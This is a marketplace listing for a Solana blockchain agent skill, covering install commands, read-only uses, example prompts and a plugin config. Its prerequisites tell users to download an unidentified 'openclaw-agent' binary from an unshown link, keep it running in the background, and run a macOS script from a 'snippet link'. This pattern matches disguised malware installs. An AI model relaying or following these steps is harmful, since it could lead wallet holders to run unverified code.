solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Master Solana blockchain interaction with OpenClaw. Check balances, view SPL tokens, monitor NFTs, and automate wallet data analysis with this powerful CLI-integrated agent skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-9ahmtWhat This Skill Does
The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. By integrating the Solana CLI and specialized utilities like Metaboss and the spl-token suite, this skill enables your agent to perform complex on-chain queries, monitor wallet activity, and analyze token data in real-time. Whether you are tracking a portfolio, verifying transaction histories, or auditing NFT metadata, this skill provides the programmatic interface needed to bridge the gap between human intent and decentralized ledger data. It supports standard wallet interactions, allowing users to query balances, view SPL token holdings, and track staking activity with precision.
Installation
To enable this skill, run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-9ahmt.
Prerequisites: You must have the openclaw-agent utility installed.
- Windows: Download the binary from the provided GitHub link, extract it, and ensure it is running in the background.
- macOS: Follow the provided script in the snippet link to set up your environment variables correctly.
- Dependencies: Ensure the Solana CLI tool suite is installed and the network configuration is set to your preferred endpoint (defaulting to the mainnet-beta RPC).
Use Cases
This skill is perfect for developers, traders, and blockchain enthusiasts who need to automate data collection. Common use cases include: monitoring cold storage wallet balances for changes, auditing NFT ownership history using Metaboss, creating automated reporting scripts for SPL token portfolios, and performing ad-hoc blockchain forensics when investigating transaction hashes or account states. It is also an excellent tool for dApp developers needing to verify account data structures without manually navigating block explorers.
Example Prompts
- "Check the current SOL balance and all SPL token holdings for address 7C4jsPZ..."
- "What is the transaction history for my wallet address [ADDRESS] over the last 10 transactions?"
- "Decode the metadata for the NFT with mint address [MINT_ADDRESS] and show me the creator details."
Tips & Limitations
- Safety: Always verify addresses before querying. Never share your private keys; this skill is designed for read-only monitoring and account data retrieval.
- Performance: For high-frequency monitoring, use the provided
watchcommand or script a local worker rather than querying through the UI repeatedly. - Connectivity: Ensure your local RPC endpoint is stable. Public endpoints can be rate-limited; if you receive errors, consider switching to a dedicated RPC provider. The utility requires active local agent permissions to execute shell-level commands for blockchain interaction.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-9ahmt": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.